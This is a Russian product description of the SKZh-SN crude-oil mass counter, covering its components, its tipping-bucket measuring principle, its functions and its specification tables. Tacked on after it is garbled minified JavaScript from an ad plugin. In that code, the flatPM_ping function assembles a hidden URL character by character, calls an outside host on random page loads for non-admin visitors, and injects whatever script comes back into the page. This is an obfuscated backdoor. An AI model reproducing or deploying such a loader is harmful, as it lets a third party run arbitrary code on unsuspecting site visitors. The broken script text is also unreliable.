  • СКЖ-СН предназначены для измерения массы сырой нефти в составе водогазонефтяной смеси, поступающей из скважин, на объектах добычи нефти и узлах оперативного контроля учета нефти.
  • Возможно использование счетчиков для измерения массы растворов различных веществ, в том числе пульп с мелкодисперсными частицами.
  • СКЖ-СН конструктивно состоит из следующих блоков:
  • входной коллектор;
  • выходной коллектор;
  • камера измерительная;
  • блок измерительный (БИ);
  • блок вычислительный (БВ).

По мере прохождения продукции скважины через СКЖ-СН, по заданному алгоритму управления измерениями производятся прямые измерения первичными датчиками (преобразователями) физических величин:

  • температуры жидкостного потока с помощью преобразователей температуры;
  • давлений жидкостного потока с помощью преобразователей давления;
  • диэлектрической проницаемости измеряемой среды при помощи
  • емкостного датчика собственной конструкции;
  • интервала времени измерений с помощью таймера БВ.

На базе результатов прямых измерений, а так же значений плотностей обезвоженной дегазированной нефти, пластовой воды и осушенного попутного нефтяного газа, определенных в химико – аналитической лаборатории (ХАЛ), предварительно внесенных в память БВ в качестве условно постоянных величин, БВ автоматически производит вычисления.

Принцип действия счетчика основан на поочередном заполнении сырой нефтью одного из двух призматических ковшей, находящихся в измерительной камере с грузовым уравновешиванием и последующим их опрокидыванием в момент достижения в них определенной массы жидкости. Частота заполнений и последующих сливов измерительных камер определяет массовый расход протекающей жидкости. 

Для ввода рабочей жидкости и ее вывода предназначен коллектор и регулируемое входное устройство (сопло). 

Газожидкостная смесь подается во входной коллектор, затем через сопло в измерительную камеру, для заполнения одного ковша измерительной камеры до величины (в единицах массы), приводящей к изменению условия устойчивого равновесия, обусловленного положением центра масс ковшов в измерительной камере, приводит к повороту ковшов измерительной камеры и сливу жидкости из ковша в корпус камеры. Затем этот процесс повторяется на втором ковше камеры. Одновременно в выходной коллектор вытесняется жидкость, находящаяся в нижней части корпуса камеры.

При заполнении измерительной камеры часть газа из газожидкостной смеси выделяется за счет эффекта гравитационной сепарации. Избыток газа также вытесняется в выходной коллектор.

Необходимым условием работы в закрытой системе сбора (под избыточным давлением), является наличие газа в корпусе преобразователя, в нашем случае он выделяется из состава газожидкостной смеси в процессе работы счетчика.

Преобразование числа поворотов (опрокидываний) измерительной камеры в электрические импульсы осуществляется посредством воздействия магнитных датчиков, закрепленных в измерительной камере.

При использовании вычислителя показания массы жидкости и расхода отображаются на индикаторе, а также фиксируются и хранятся в течение определенного времени в архиве. Кроме того, возможна передача нормируемого импульса в систему телеметрии:

  • плотности сырой нефти и ее компонентов в рабочих условиях;
  • объема и объемного расхода сырой нефти в рабочих условиях;
  • массы и массового расхода сырой нефти в рабочих условиях;
  • массы и массового расхода сырой нефти без учета воды в рабочих условиях;
  • объема и объемного расхода сырой нефти без учета воды в рабочих условиях;
  • объема и объемного расхода свободного газа в сырой нефти в рабочих условиях;
  • приведение вычисленных значений объема и объемного расхода сырой нефти,
  • сырой нефти без учета воды и свободного газа к стандартным условиям.

При введении в БВ данных по содержанию механических примесей и хлористых солей в сырой нефти, по результатам исследований пробы сырой нефти в ХАЛ, СКЖ-СН имеет возможность производить вычисления массы нетто нефти, а также корректировки массы нетто сырой нефти с учетом оценки количества растворенного в ней газа.

Метрологические и технические характеристики СКЖ-СН и характеристики измеряемой среды согласно требованиям и рекомендациям:

  • ГОСТ Р 8.615- ГСИ. Измерения количества извлекаемой из недр нефти и нефтяного газа. Основные метрологические и технические требования;
  • МИ 2693-2001 Рекомендация ГСИ Порядок проведения коммерческого учета сырой нефти на нефтедобывающих предприятиях. Основные положения.

 Основные функции выполняемые СКЖ-СН.

СКЖ-СН выполняет следующие функции:

  • измерение давления в трубопроводе;
  • измерение температуры измеряемой среды;
  • вычисление массового расхода сырой нефти;
  • вычисление массы сырой нефти;
  • вычисление массы сырой нефти без учета воды;
  • вычисление % содержания воды в сырой нефти;
  • индикацию плотности водогазонефтяной смеси;
  • накопление и хранение интегральных значений измеренных и вычисленных параметров;
  • индикацию измеряемых, вычисляемых, программируемых параметров на жидкокристаллическом индикаторе блока вычислений;
  • хранение ранее записанных данных при отключении сетевого питания;
  • передача измеряемых и расчётных параметров на АРМ – оператора.

При введении в БВ данных по содержанию механических примесей и хлористых солей в сырой нефти, согласно результатов исследований пробы сырой нефти аттестованной в установленном порядке лабораторией, СКЖ-СН имеет возможность производить вычисления массы нетто нефти.

Таблица 1

№ п.п.  Наименование Единица измерения Данные
1. Режим работы непрерывный
2.  Условия эксплуатации
2.1. температура окружающей среды ОС от минус 35 до плюс 55
2.2. давление окружающей среды мм.рт.ст. от 680 до 770
2.3. относительная влажность % от 30 до 95
3. Требования для питающего напряжения первичных датчиков
3.1. номинальное постоянное  напряжение В 24±10%
3.2. потребляемый ток мА не более 50
4. Требования для питающего напряжения электронного блока вычислений
4.1. напряжение однофазное В 230+33-22
4.2. частота питающего напряжения Гц 50 ±1,0
4.3. потребляемый ток не более, А 3,5
5. Требования для рабочего продукта, проходящего в трубопроводе
5.1. давление в трубопроводе, не более МПа 6,3
5.2. рабочий диапазон температуры ОС от плюс 5 до плюс 70
5.3. плотность рабочего продукта скважин кг/м3 от 700 до 1270
5.4. вязкость кинематическая продукта мм /сек2.(сСт) от 5 до 150
5.6. объемная (массовая) доля воды % от 0 до 100
5.7. массовая доля механических примесей, не более % 0,15
5.8. массовая доля парафина, не более % 7
5.9. массовая доля смол, не более % 7
5.10 массовая доля серы, не более % 3,5
5.11 концентрация хлористых солей, не более % 30
5.12 содержание сероводорода и этил-метил-меркаптанов, не более % 0,1
6. Средний срок службы СКЖ-СН, не менее               лет 8

Таблица 2

Наименование Единица измерения Значение
Рабочий диапазон массового расхода сырой нефти т/ч 0,1 -50,0
Рабочий диапазон объемного расхода попутного нефтяного газа, приведенный к стандартным условиям м3/ч 0,5 -6000
Относительная погрешность при измерениях:
массы и среднего массового расхода сырой нефти % ±2,0
объема и среднего объемного расхода сырой нефти % ±1,5
  1. массы и среднего массового расхода сырой нефти без учета воды, при содержании воды в сырой нефти, %:
  2. до 70%
  3. от 70% до 95%
% ±5,0 ±10,0

Представление результатов измерений – в цифровом виде с ценой деления 0,001.

Источник: http://techservis.su/catalog/metrologicheskoe-oborudovanie/schetchiki-kolichestva-zhidkosti-syroy-nefti/

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};